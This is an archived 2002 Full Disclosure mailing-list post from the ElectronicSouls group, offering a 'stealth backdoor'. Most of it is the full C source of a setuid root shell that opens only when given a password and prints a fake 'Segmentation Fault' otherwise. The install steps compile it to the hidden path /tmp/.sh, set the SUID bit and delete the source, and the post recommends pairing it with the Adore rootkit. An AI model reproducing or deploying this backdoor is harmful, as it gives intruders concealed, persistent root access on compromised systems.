Full Disclosure mailing list archives
[ElectronicSouls] - Stealth Backdoor
From: es () hush com
Date: Fri, 29 Nov 2002 09:50:21 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Here's a useful way to locally backdoor a machine. We suggest that you use it along with Adore(tm) on your honeypots. # cat sps.c /* * SUID PASSWORD SHELL Coded by CraigTM [ElectronicSouls] * This will only give you a shell, if a password is given * If no password is specified, it will look as if it coredumps * * install: * gcc sps.c -o /tmp/.sh * chmod +s /tmp/.sh * rm -f sps.c * * run: * /tmp/.sh pw * --> uid(0) * * */ #include <stdio.h> #define PASS "pw" main(int argc, char **argv) { if( (strcmp(argv[1],PASS)==0) ) { setreuid(0, 0); setregid(0, 0); printf("[ *** Welcome to SPS ;) ][ (C) CraigTM [ElectronicSouls] *** ] \n\n"); execl("/bin/sh", "/bin/sh", NULL); } else { printf("Segmentation Fault\n"); exit(0); } } # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "Mary had a little lamb." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nqPAMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt4W8An0pgX0aPc3GG 7CY4jSfIuJ7F6jXgAJ0c5fT8ICwCc+gAdgxpWAzjrSSZLg== =sqV9 -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - Stealth Backdoor es (Nov 29)